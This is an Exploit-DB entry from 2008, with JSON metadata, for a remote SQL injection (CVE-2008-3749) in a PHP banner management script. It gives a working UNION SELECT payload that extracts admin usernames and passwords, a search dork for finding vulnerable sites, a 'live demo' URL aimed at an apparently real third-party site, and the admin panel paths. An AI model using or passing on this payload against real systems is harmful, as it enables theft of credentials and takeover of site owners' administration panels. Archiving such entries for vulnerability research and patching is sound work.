ID EDB-ID:6276
Type exploitdb
Reporter S.W.A.T.
Modified 2008-08-19T00:00:00
Description
Banner Management Script (tr.php id) Remote SQL Injection Vulnerability. CVE-2008-3749. Webapps exploit for php platform
|___________________________________________________|
|
| Banner Management Script (tr.php id) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------S.W.A.T.----------------------|
|
| Author: S.W.A.T.
|
| Home : www.svvat.ir
|
| email: svvateam[at]Yahoo[DoT]com
|
|
|___________________________________________________
| |
|
| script : http://www.yourfreeworld.com/script/bannermanagementscript.php
|
| DorK : inurl:tr.php?id= Banner
|___________________________________________________|
Exploit:
________
www.[target].com/Script/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
L!VE DEMO:
_________
http://www.downlinegoldmine.com/bannermanagerpro/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
____________
Admin Login :
www.[target].com/Script/admin.php
or
www.[target].com/Script/adadmin.php
# milw0rm.com [2008-08-19]
{"bulletinFamily": "exploit", "id": "EDB-ID:6276", "cvelist": ["CVE-2008-3749"], "modified": "2008-08-19T00:00:00", "lastseen": "2016-01-31T23:33:10", "edition": 1, "sourceData": "|___________________________________________________|\n|\n| Banner Management Script (tr.php id) Remote SQL Injection Vulnerability\n|\n|___________________________________________________\n|---------------------S.W.A.T.----------------------|\n|\n| Author: S.W.A.T.\n|\n| Home : www.svvat.ir\n|\n| email: svvateam[at]Yahoo[DoT]com\n|\n|\n|___________________________________________________\n| |\n|\n| script : http://www.yourfreeworld.com/script/bannermanagementscript.php\n|\n| DorK : inurl:tr.php?id= Banner\n|___________________________________________________|\n\nExploit:\n________\n\n\n\nwww.[target].com/Script/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--\n\n\n\n\n\n\nL!VE DEMO:\n_________\n\n\nhttp://www.downlinegoldmine.com/bannermanagerpro/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--\n\n\n____________\n\nAdmin Login :\n\nwww.[target].com/Script/admin.php\n\nor\n\nwww.[target].com/Script/adadmin.php\n\n# milw0rm.com [2008-08-19]\n", "published": "2008-08-19T00:00:00", "href": "https://www.exploit-db.com/exploits/6276/", "osvdbidlist": ["47579"], "reporter": "S.W.A.T.", "hash": "2eb0210fdc3c2ce3a7bb1c6599a2cf370f7f3a9b4eae4780cb369e0aaf263a9a", "title": "Banner Management Script tr.php id Remote SQL Injection Vulnerability", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Banner Management Script (tr.php id) Remote SQL Injection Vulnerability. CVE-2008-3749. Webapps exploit for php platform", "references": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/6276/", "enchantments": {"vulnersScore": 3.5}}
{"result": {"cve": [{"id": "CVE-2008-3749", "type": "cve", "title": "CVE-2008-3749", "description": "SQL injection vulnerability in tr.php in YourFreeWorld Banner Management Script allows remote attackers to execute arbitrary SQL commands via the id parameter.", "published": "2008-08-21T13:41:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3749", "cvelist": ["CVE-2008-3749"], "lastseen": "2017-09-29T14:26:04"}]}}